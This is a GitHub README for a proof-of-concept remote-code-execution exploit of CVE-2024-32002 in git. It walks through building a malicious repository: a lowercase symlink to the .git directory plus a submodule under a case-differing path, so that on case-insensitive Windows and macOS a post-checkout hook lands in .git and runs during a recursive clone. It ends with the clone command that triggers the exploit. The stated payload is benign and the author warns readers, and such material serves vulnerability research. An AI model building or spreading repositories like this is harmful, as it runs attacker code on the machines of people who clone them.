Skip to content

JakobTheDev/cve-2024-32002-poc-rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

74 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-32002 RCE POC

A POC for CVE-2024-32002 demonstrating Remote Code Execution (RCE).

See cve-2024-32002-poc-rce for the related submodule repository.

What this repo contains

  • A symlink with an arbitraty name that links to the .git directory.
  • A .gitmodules file that defines the malicious submodule.

How to recreate this repo

This repo was created in Linux (WSL2, to be specific). This is important, the malicious repo can only be created on a case-sensitive filesystem.

  1. Create a symlink, using all lowercase characters
ln -s .git submodule

Notes:

  • The symlink should point to the .git folder, since this is where we want to write files
  • The symlink name (submodule) is arbitrary, but should start with a lowercase character
  • This is important, because lowercase characters sort earlier than uppercase characters. When the clonong machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.
  1. Add the malicious submodule, noting the case difference on the submodule directory name
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

Notes:

  • The name of the submodule ("rce/notexists") matters, it wil come into play when placing our hook in the submodule.
    • "rce" must match the last segment of the Submodule's path.
    • "notexists" must match the name of the directory containing hooks/post-checkout in the submodule directory. See cve-2024-32002-poc-rce.
  • The structure of the submodule path ("Submodule/modules/rce") also matters:
    • The first segment of the submodule's path ("Submodule") should match the symlink name above, just differing in case.
    • The second segment ("modules") matches the name of the path within the .git directory that tracks git status for submodules.
    • The third segment ("rce") must natch the first segment of the submodule name above.

How to run the POC

This vulnerability only affects Windows and MacOS because they both have case-insensitive filesystems.

  1. Check whether you have a vulnerable version of git. See the GitHub advisory for affected versions.
git --version
  1. Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
  2. Run the following command:
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. If the POC worked, you should be able to do some calculating!

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published